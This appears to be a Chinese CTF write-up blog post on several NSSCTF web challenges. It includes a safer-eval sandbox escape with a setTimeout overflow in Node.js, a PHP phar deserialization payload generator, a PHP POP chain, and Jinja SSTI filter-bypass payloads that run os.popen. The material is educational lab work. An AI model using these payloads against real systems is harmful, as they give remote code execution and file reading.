NSSCTF第15页（2)

[GKCTF 2020]ez三剑客-easynode

有源代码，点进来看

const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 老板说为了后期方便优化
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度，我就直接这样写了，其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码，用行数计算KPI
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 为了方便我自己查看版本，加上这个接口
app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});

?这道题主要涉及js代码，看着几个大佬的wp进行复现的

标红的地方看到了eval函数

查看版本发现了safer-eval是1.3.6版本的

发现存在该版本下的safe-eval沙箱逃逸

突围 ·期刊 #10 ·评论hol/safer-eval ·GitHub的

接下来就是这块：

app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度，我就直接这样写了，其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

这里的意思就是。我们传入一个delay和原先定义的60000进行比较。大的值复制给delay
然后作为timeout的值传入
显然。默认定义超时6秒。进入下个路由。
但是我们的代码不能超时6秒。也就不能进去下个路由执行沙盒逃逸了
那么问题就出在这个settimeout函数上。?

详解setTimeout()_settimeout函数-CSDN博客

https://www.cnblogs.com/beimingbingpo/p/8532023.html

delay传入4294967296。造成settimeout设置为1.
如果超过1毫秒。就进入eval
导致恶意代码被执行?

get:? /eval?delay=4294967296?

post: ? e=setInterval.constructor('return process')().mainModule.require('child_process').execSync('cat /flag').toString();

[HNCTF 2022 WEEK3]ez_phar

看到源码，尝试访问upload.php

发现成功访问

?因为源码中存在file_exists()函数，可以利用phar反序列化

在PHP中的file_exists()函数-php教程-PHP中文网

PHP Phar反序列化总结_ctf phpphar反序列化-CSDN博客

基本思路就是利用上传的phar文件进行反序列化利用?

上传phar文件

<?php
class Flag{
??? public $code = "system('cat /ffflllaaaggg');"; //system('ls /');
}
$a = new Flag();
?
?
$phar = new phar('b.phar');//对phar对象进行实例化，以便后续操作。
?
?
$phar -> startBuffering();//缓冲phar写操作（不用特别注意）
?
?
$phar -> setStub("<?php __HALT_COMPILER(); ?>");//设置stub，为固定格式
?
?
$phar -> setMetadata($a);//把我们的对象写进Metadata中
?
?
$phar -> addFromString("test.txt","helloworld!!");//写压缩文件的内容，这里没利用点，可以随便写
?
?
$phar -> stopBuffering();//停止缓冲
?>?

提示只能传图片上去

?修改一下后缀，得到flag

?[FSCTF 2023]ez_php2

参考nssctf大佬的wp复现出来，pop链的构造还是有很大的问题

<?php
Class Rd{
??? public $ending;
??? public $cl;
?
??? public $poc;
}

class Poc{
??? public $payload;
?
??? public $fun;
}
?
class Er{
??? public $symbol;
??? public $Flag='cat /flag';//? ls /
?
}
?
class Ha{
??? public $start;
??? public $start1;
??? public $start2="11111";
}
?
$a=new Ha();
$a->start1=new Rd();
$a->start=['POC'=>'1111'];
$a->start1->cl=new Er();
echo serialize($a);
?>

?

[GWCTF 2019]你的名字

输入{{7*7}}发现报错

?试了下{{7*7}}直接报错，还是报的php的错，但是{7*7}就可以正常显示出来,这就说明{{可能被过滤了，而{可能没被过滤，所以我们再试一些只要{}就能用的句子试试，如{% set a=“test” %}

?[GWCTF 2019]你的名字-CSDN博客

大佬的这篇博客写的很详细

利用{% print %}可以发现有回显

{% print(lipsum|string|list) %}

?这里还得补充一点，{%print %}形式下，若果你构造的payload是正常的ssti用到的语句却没有回显，就说明你的语句中可能有关键字被过滤了，如{%print ‘’.class %}执行之后没有任何的回显，但{%print ‘’.clconfigass %}成功执行有回显，这说明class被过滤了

让看环境变量

1.拼接绕过

1.{%print lipsum.__globals__['__bui'+'ltins__']['__im'+'port__']('o'+'s')['po'+'pen']('env').read()%}

2.

{%set a='__bui'+'ltins__'%}
{%set b='__im'+'port__'%}
{%set c='o'+'s'%}
{%set d='po'+'pen'%}
{%print(lipsum['__globals__'][a][b](c)[d]('env')['read']())%}?

?2.双写绕过

name={%print().__claconfigss__.__base__.__subclaconfigsses__()[258].__init__.__globals__['oconfigs'].popconfigen('env').read()%}

[NSSRound#8 Basic]Upload_gogoggo

是go语言的文件上传，第一次遇到

?NSSCTF Round#8 Basic-CSDN博客

弹shell一直没学会，暂时搁浅